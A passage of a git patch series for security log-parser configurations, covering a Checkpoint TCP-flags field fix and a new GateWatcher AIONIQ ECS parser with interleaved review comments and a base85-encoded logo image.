Subject: [PATCH 005/317] fix linter
---
 Checkpoint/checkpoint/_meta/fields.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/Checkpoint/checkpoint/_meta/fields.yml b/Checkpoint/checkpoint/_meta/fields.yml
index 9a297d00a..8c5d0787a 100644
--- a/Checkpoint/checkpoint/_meta/fields.yml
+++ b/Checkpoint/checkpoint/_meta/fields.yml
@@ -143,6 +143,11 @@ action.target: name: action.target type: keyword
+action.tcp.flag:
+ description: The control flag of the data flow
+ name: action.tcp.flag
+ type: keyword
+
 destination.size_in_char: description: '' name: destination.size_in_char
@@ -152,8 +157,3 @@ source.size_in_char: description: '' name: source.size_in_char type: number
-
-action.tcp.flag:
- description: The control flag of the data flow
- name: action.tcp.flag
- type: keyword
From b69dbb64d24e41d8f1b3550017a94345000c70d1 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev"
Date: Mon, 9 Sep 2024 16:11:53 +0300
Subject: [PATCH 006/317] Fix comments
---
 Checkpoint/checkpoint/ingest/parser.yml | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)
diff --git a/Checkpoint/checkpoint/ingest/parser.yml b/Checkpoint/checkpoint/ingest/parser.yml
index 6b807ae32..36ba7d7bb 100644
--- a/Checkpoint/checkpoint/ingest/parser.yml
+++ b/Checkpoint/checkpoint/ingest/parser.yml
@@ -168,10 +168,7 @@ stages: url.full: "{{checkpoint.message.request}}" url.original: "{{checkpoint.message.request}}" user_agent.original: "{{checkpoint.message.user_agent}}"
-
- - set:
- action.tcp.flag: "{{checkpoint.message.cs4}}"
- filter: "{{checkpoint.message.cs4Label == 'TCP Flags'}}"
+ action.tcp.flag: "{{checkpoint.message.get('TCP Flags')}}"
 - translate: dictionary:
From d2ba04e0aaa9b274bf65aa13a183debdd7b51486 Mon Sep 17 00:00:00 2001
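Review bot: Folding `action.tcp.flag` into the shared `set` stage removes the `filter:` that previously guarded it, so the assignment now runs on every event and `checkpoint.message.get('TCP Flags')` yields None whenever the key is absent; unless the set stage drops empty renderings (not visible here) that writes an empty or `None` string into a keyword field on every non-TCP log. Either keep it as its own guarded action, `filter: "{{checkpoint.message.get('TCP Flags') != None}}"`, or confirm and note in a comment that empty template results are discarded by the engine. The rewrite also assumes an earlier stage has already turned the `cs4Label`/`cs4` pair into a `TCP Flags` key; that stage is outside this hunk, so the CEF_drop_1 fixture is the only thing pinning that assumption and is worth a comment next to this line, e.g. `# CEF csN/csNLabel pairs are resolved to label-named keys upstream`. The enclosing `set` action starts before this hunk.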
From: Clement Lyonnet
Date: Mon, 9 Sep 2024 16:31:23 +0200
Subject: [PATCH 007/317] First proposal: Gatewatcher ECS parser
---
 GateWatcher/aioniq_ecs/_meta/fields.yml | 1 +
 GateWatcher/aioniq_ecs/_meta/logo.png | Bin 0 -> 41007 bytes
 .../aioniq_ecs/_meta/smart-descriptions.json | 186 +++++
 GateWatcher/aioniq_ecs/ingest/parser.yml | 768 ++++++++++++++++++
 4 files changed, 955 insertions(+)
 create mode 100644 GateWatcher/aioniq_ecs/_meta/fields.yml
 create mode 100644 GateWatcher/aioniq_ecs/_meta/logo.png
 create mode 100644 GateWatcher/aioniq_ecs/_meta/smart-descriptions.json
 create mode 100644 GateWatcher/aioniq_ecs/ingest/parser.yml
diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
new file mode 100644
index 000000000..c6cac6926
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -0,0 +1 @@
+empty
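Review bot: The new `fields.yml` consists of the bare scalar `empty`, which YAML loads as the string "empty" rather than a mapping of field definitions like the other `_meta/fields.yml` files in this series, so any loader or linter that expects a mapping will either reject the module or iterate over the characters of that string. If the module genuinely declares no custom fields yet, make that explicit with an empty mapping, `{}`, or a commented placeholder such as `# no custom fields declared yet`, so the file parses to the expected type. The diffstat shows a 768-line `parser.yml` and a `smart-descriptions.json` in the same commit that are not in view here, so this note covers only `fields.yml`.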
diff --git a/GateWatcher/aioniq_ecs/_meta/logo.png b/GateWatcher/aioniq_ecs/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..21f93317af33899c7ac0ebce3be11e5a0ccea019 GIT binary patch literal 41007 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 